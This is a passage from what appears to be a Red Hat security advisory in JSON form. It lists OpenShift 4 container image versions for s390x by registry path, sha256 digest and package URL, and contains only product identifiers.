"product_id": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-proxy-rhel9@sha256%3Ac16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572089"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-alertmanager-rhel9@sha256%3A470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606841"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-node-exporter-rhel9@sha256%3A399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606783"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9@sha256%3Acfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604596"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"product_id": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hypershift-rhel9@sha256%3Ae6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573226"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"product_id": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-proxy-rhel9@sha256%3Ac471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604683"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"product_id": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-rbac-proxy-rhel9@sha256%3Ab06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563881"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"product_id": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-state-metrics-rhel9@sha256%3A85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564691"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"product_id": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-marketplace-rhel9@sha256%3A9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564608"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"product_id": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-monitoring-plugin-rhel9@sha256%3A85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577192"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-rhel9@sha256%3Ad3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605333"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-microshift-rhel9@sha256%3A9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572688"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"product_id": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-networkpolicy-rhel9@sha256%3Ad8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572927"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"product_id": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-networking-console-plugin-rhel9@sha256%3Af4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577127"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"product_id": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-server-rhel9@sha256%3A8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605151"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"product": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"product_id": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/oc-mirror-plugin-rhel9@sha256%3A596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565249"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"product_id": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-builder-rhel9@sha256%3A6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606800"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-rhel9@sha256%3A95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563791"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9@sha256%3A0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775630129"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9-operator@sha256%3Ae6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606311"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"product_id": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-deployer-rhel9@sha256%3Acf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577046"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"product_id": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-haproxy-router-rhel9@sha256%3Adae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577060"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"product_id": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hyperkube-rhel9@sha256%3A720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557435"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"product_id": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-keepalived-ipfailover-rhel9@sha256%3A2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604322"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"product_id": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-pod-rhel9@sha256%3Aafbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572233"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"product_id": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-registry-rhel9@sha256%3Abfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605796"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"product_id": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tests-rhel9@sha256%3A8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775578545"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-state-metrics-rhel9@sha256%3A9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604183"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cluster-api-controllers-rhel9@sha256%3Ab12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606714"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"product": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"product_id": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openstack-resource-controller-rhel9@sha256%3Aed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606963"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"product_id": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-lifecycle-manager-rhel9@sha256%3Afc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604626"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"product_id": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-registry-rhel9@sha256%3A337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565149"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-api-server-rhel9@sha256%3Aae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606032"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-csr-approver-rhel9@sha256%3Ad85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572826"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-node-agent-rhel9@sha256%3A5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606441"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"product_id": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-agent-installer-orchestrator-rhel9@sha256%3A590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572582"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"product": {
